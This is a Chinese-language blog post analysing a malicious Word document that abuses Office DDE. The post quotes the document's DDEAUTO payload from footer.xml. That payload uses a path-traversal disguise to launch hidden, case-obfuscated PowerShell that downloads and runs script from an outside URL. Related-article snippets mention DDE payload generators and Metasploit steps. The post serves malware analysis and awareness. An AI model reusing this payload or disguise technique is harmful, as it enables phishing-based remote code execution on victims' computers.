使用Office进行DDE攻击

最新推荐文章于 2022-10-11 15:47:31 发布
最新推荐文章于 2022-10-11 15:47:31 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 宏病毒 文章标签: DDE攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/91867028
版权

当你打开恶意docx文件时,会有提示信息,不过通过解析路径的手段,把可疑部分隐藏了。

这个提示信息,看起来是启动我Word安装目录下的一个程序,普通人觉得,Word启动它自己目录下的程序,应该很正常呀!于是就点了

在这里插入图片描述
此时用procexp查看进程列表,恶意的代码已经执行了~

在这里插入图片描述

如果用7z来打开这个docx文件,可以看到里面的footer.xml文件中包含的恶意部分

在这里插入图片描述

DDEAUTO  "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c 
pOWeRShELl.exe  -NoP -W Hidden IEX(nEw-oBjECt sYstEM.nEt.wEBcLIeNt).dOWnLoADsTRiNg('http://stinky.esy.es/ip.php'); 
#"  "Financial Security Institue RFRE System"

powershell.exe会从'http://stinky.esy.es/ip.php下载新的ps代码执行

在这里插入图片描述

代码还原后

在这里插入图片描述

FFE4
关注
专栏目录
【漏洞挖掘】——22、DDE漏洞攻击介绍
Fly_鹏程万里
03-03 1327
2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估。
利用PowerShell Empire实现Word文档DDE攻击控制(简单没啥用)
墨痕诉清风的博客
04-09 474
近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExcel漏洞,就能实现在Office文档中执行恶意命令目的。在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实现方法,我仅作个抛砖引玉。 创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。 当监听线程启动运行之后,运行
加快word启动速度
skywalker_ll的博客
12-03 1226
加快word启动速度2008-11-20 16:35第一步:在资源管理器--工具--文件夹选项--文件类型中选中扩展名为DOC,点击"高级"-选择"打开"-点击"编辑"-在"用于执行编辑的应用程序中"在/n的后而加上"%1"(注:一定要添上空格及“”号)例如:"D:/Program/Microsoft Office/OFFICE11/WINWORD.EXE" /n
谨防钓鱼——OFFICE DDE复现
tempulcc的博客
09-08 540
OFFICE DDE,这是微软的 OFFICE中的一个功能,能过够执行公式,插入远程图片,也可以用来执行恶意代码,即有了OFFICE DDE漏洞,cve编号:CVE-2017-11882,刚开始漏洞被发现的时候,微软并没有认为是漏洞,认为这是OFFICE软件的正常功能。 正好今天学习metasploit,拿这个漏洞练练手 msfconsole search office-dde use exploit/windows/fileformat/office_dde_delivery set payload
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击
weixin_45575473的博客
04-20 594
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 DDE DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。 通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。 在MSWord和MSExcel里,我们可以使用DDE来执行命令。 DDE
Office DDE漏洞临时解决方案
Tide的小家
12-18 833
紧急修复方案
Office DDE 攻击
10-24 221
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods ...
word中的dde
weixin_33816300的博客
04-20 547
word使用快捷键ctrl+f9 打开后有个大括号,在里边输入系统命令可以执行。配合powershell可以做很多事。 现象(一) 现象(二) 执行成功 解决方案(1): 在word选项中,勾选显示域代码而非域值。这样在打开的文档中可以直接看到域代码。 解决方案(2):关闭自动更新链接 解决方案(3):注册表彻底禁用 来自:https://gist.github.com/wdorman...
DDE-MS_WORD-Exploit_Detector:Microsoft Office Word文件(doc,docx)通过AX302进行DDE攻击检查
05-10
DDE RCE(CVE-2017-11826)检测器: Microsoft Office Word文件(doc,docx)通过AX302进行DDE攻击检查 您将可以检查某些Word文档是否被感染! 然后解压缩xml文件以读取有效负载,而没有风险:p!
DeeDee:Stealthy DDE Exploit有效载荷生成器和DOCX文件注入器
05-18
DeeDee是一个脚本,用于快速生成DDE Exploit有效负载并将其插入到现成的文档中,以进行针对MS Office用户的网络钓鱼尝试。 该脚本的目的是简化并减少将恶意DDE有效负载插入Office文档的受支持版本所必需的步骤。 它...
Office DDE漏洞学习笔记
weixin_30315435的博客
03-11 393
1、前言 2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录。在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点。 2、office DDE Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。 这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容...
java程序拦截dde漏洞问题_勒索病毒又更新 Office DDE漏洞被利用
weixin_33186395的博客
03-01 388
勒索软件已见怪不怪了,下半年每天都有新的勒索软件出现,中毒电脑文件被高强度加密,能恢复的极为罕见,受害用户损失惨重。勒索病毒的攻击手法也无所不用其极,本周末,金山毒霸安全实验室再次截获最新的勒索软件,该病毒利用Office DDE漏洞(Microsoft动态数据交换),极具伪装性、欺骗性,用户点错对话框会立刻导致电脑文件被加密。病毒最初来源于不法分子精心伪造的电子邮件,如果收件人粗心大意,下载点击...
java程序拦截dde漏洞问题_HackerNews
weixin_29289821的博客
03-01 308
近日,Mimecast 威胁中心的安全研究人员,发现了微软 Excel 电子表格应用程序的一个新漏洞,获致 1.2 亿用户易受网络攻击。其指出,该安全漏洞意味着攻击者可以利用 Excel 的 Power Query 查询工具,在电子表格上启用远程动态数据交换(DDE),并控制有效负载。此外,Power Query 还能够用于将恶意代码嵌入数据源并进行传播。(图自:Mimecast,viaBeta...
使用DDE来操作Word
ljmwork的专栏
07-03 2819
使用DDE来操作Word Windows支持三种基本的IPC(进程间通信)机制:动态链接库(DLL)中的共享数据段、Windows剪贴版(Clipboard)和动态数据交换DDE(Dynamic         Data Exchange)。许多著名的Windows应用程序如Microsoft         Word等都宣布支持DDE技术,并在程序中嵌入了D
关于word中的DDE如何查看
最新发布
qq_45844442的博客
10-11 408
word当中可以内置一些代码,而这些代码有个专业名词叫做域代码,一般情况下这个代码是被隐藏了,需要在。其中里面有会置入大量数字,其实都是ASCII码,如图所示。勾选上即可看见(我使用的是WPS)
【安全】【测试思路】文件上传下载之绕过上传时内容校验的DDE注入攻击
次次次不吃饼干_的博客
07-28 1593
【安全】【测试思路】文件上传下载之基于bypass的DDE注入攻击DDE注入介绍测试流程图测试思路服务器搭建攻击脚本参考上传文件准备 DDE注入介绍   DDE(Dynamic Data Exchange,动态数据交换)是应用之间传输数据的一种方法。Excel可以使用这种机制,根据外部应用的处理结果来更新单元格的内容。因此,如果我们制作包含(恶意)DDE公式的xlsx/csv文件,那么在打开该文件时,Excel就会尝试执行外部应用,以达到攻击的目的。 测试流程图 测试思路 服务器搭建   在这里,咱们可以使
csv注入文件
HoAd'blog
08-06 631
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
Web安全-浅析CSV注入漏洞的原理及利用
道阻且长,行则将至。
05-01 4199
文章目录漏洞简介漏洞原理漏洞利用命令执行钓鱼攻击反弹shell漏洞实例Twitter网站Hackerone漏洞挖掘漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏洞通常会出现在有导出文件 (.csv/.xls) 功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL 会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理 人们通常认为 CSV 或 xls 文件中包含的文本不会有任何安全风险,这是比较大的一个误区。
MS Office DDE攻击详解与防御策略
对于Outlook而言,由于它使用Word作为邮件的默认解析器,DDE攻击也可以通过RTF格式的邮件进行攻击者可以创建一个包含DDE命令的Word文档,然后将其复制到Outlook的新邮件正文中。当目标用户打开邮件时,DDE命令可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值